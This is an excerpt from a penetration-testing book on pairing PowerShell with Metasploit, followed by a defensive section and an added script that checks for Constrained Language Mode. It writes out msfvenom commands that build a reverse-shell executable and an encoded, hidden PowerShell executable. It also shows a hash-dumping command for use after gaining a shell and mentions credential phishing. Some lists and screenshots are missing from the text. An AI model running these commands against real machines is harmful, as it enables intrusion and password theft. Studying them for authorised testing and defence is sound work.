PowerShell is a powerful tool for performing sophisticated attacks, and it can also be used side by side with the Metasploit Framework.
This article is an excerpt taken from the book Advanced Infrastructure Penetration Testing written by Chiheb Chebbi. In this book, you will learn advanced penetration testing techniques that will help you exploit databases, web and application servers, switches or routers, Docker, VLAN, VoIP, and VPN.
In today’s post, we will combine the flexibility of Metasploit and PowerShell. This combination is a great opportunity to perform more customized attacks and security tests.
PowerShell attacks are already integrated into Metasploit. You can check by using the search command:
msf> search powershell
Now it is time to learn how to use Metasploit with PowerShell. As a demonstration of one of its many uses, you can wrap a PowerShell payload or script in an executable file using the msfvenom utility:
>msfvenom -p windows/powershell_reverse_tcp LHOST=192.168.1.39 LPORT=4444 -f exe > evilPS.exe
>msfvenom -p windows/exec CMD="powershell -ep bypass -W Hidden -enc [Powershell script Here]" -f exe -e x86/shikata_ga_nai -o /root/home/ghost/Desktop/power.exe
PowerSploit is a well-known collection of PowerShell scripts used by information security professionals, and especially penetration testers. To download PowerSploit, clone it from its official GitHub repository, https://github.com/PowerShellMafia/PowerSploit:
# git clone https://github.com/PowerShellMafia/PowerSploit
After cloning the project, use the ls command to list the files:
From the following screenshot, you can see that PowerSploit contains a large number of scripts for performing a variety of tasks, such as:
Nishang is a great collection of tools used to perform many tasks during all the penetration testing phases. You can get it from https://github.com/samratashok/nishang:
# git clone https://github.com/samratashok/nishang
As you can see from listing the downloaded project, Nishang is loaded with many scripts and utilities for performing tasks that are commonly required during penetration testing engagements, such as:
You can explore all the available scripts by listing the contents of the Nishang project with the ls command:
Let's explore the power of some of Nishang's scripts on a Windows machine:
You can import all the modules using the Import-Module PowerShell cmdlet:
Oops, something went wrong! Don't worry: in order to use Import-Module, you need to open PowerShell as an administrator and type Set-ExecutionPolicy -ExecutionPolicy RemoteSigned:
Then you can import the modules:
Now, if you want, for example, to use the Get-Information module, you just need to type Get-Information:
If you want to unveil WLAN keys, type Get-WLAN-Keys:
You can go further and dump password hashes from a target machine during post-exploitation. The Get-PassHashes module lets you dump password hashes. This is its output on my local machine:
However, if you want to run the command directly after getting a shell, use:
Powershell.exe -exec bypass -Command "& {Import-Module '[PATH_HERE]/Get-PassHashes.ps1'; Get-PassHashes}"
You can even perform a phishing attack using Invoke-CredentialPhish, as in the previous demonstration. You can run this attack on the victim's machine:
In the previous sections, we went through various techniques for attacking machines using Metasploit and PowerShell. Now it is time to learn how to defend against and mitigate PowerShell attacks. In order to protect against PowerShell attacks, you need to enforce Constrained Language Mode, which restricts the .NET types and COM objects that scripts can use. Set the __PSLockdownPolicy environment variable at machine level from an elevated PowerShell session:
PS C:\Windows\system32> [environment]::SetEnvironmentVariable('__PSLockdownPolicy', '4', 'Machine')
Note that this setting only affects PowerShell sessions started after it is set. To verify the language mode of a session, check:
$ExecutionContext.SessionState.LanguageMode
It should return ConstrainedLanguage rather than FullLanguage.
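The following script is an added example, not code from the book or from the article above; it checks whether the __PSLockdownPolicy setting described here is actually being enforced, by reading the persisted machine-level value and then starting a fresh powershell.exe process to read its language mode. It assumes it is run from an elevated PowerShell prompt on the machine being checked, and the function name Get-PSLockdownState is my own.

```powershell
# Added example: verify that Constrained Language Mode is enforced for new sessions.
# The __PSLockdownPolicy variable is read when PowerShell starts, so the session you
# set it from keeps its old language mode; only a newly started process shows the effect.
function Get-PSLockdownState {
    # Persisted machine-level value (what future sessions will see).
    $policy = [Environment]::GetEnvironmentVariable('__PSLockdownPolicy', 'Machine')

    # Start a fresh process and ask it for its own language mode. The single quotes
    # keep $ExecutionContext from being expanded by the calling session.
    $mode = & powershell.exe -NoProfile -NonInteractive -Command '$ExecutionContext.SessionState.LanguageMode'
    $mode = "$mode".Trim()

    [pscustomobject]@{
        LockdownPolicy  = $policy
        NewSessionMode  = $mode
        Enforced        = ($mode -eq 'ConstrainedLanguage')
        ExecutionPolicy = (Get-ExecutionPolicy -Scope LocalMachine)
    }
}

$state = Get-PSLockdownState
$state | Format-List

if (-not $state.Enforced) {
    Write-Warning "Constrained Language Mode is not enforced for new sessions (policy value: '$($state.LockdownPolicy)')."
}
```

Run it once before and once after setting __PSLockdownPolicy to see NewSessionMode change from FullLanguage to ConstrainedLanguage while the calling session itself stays unchanged.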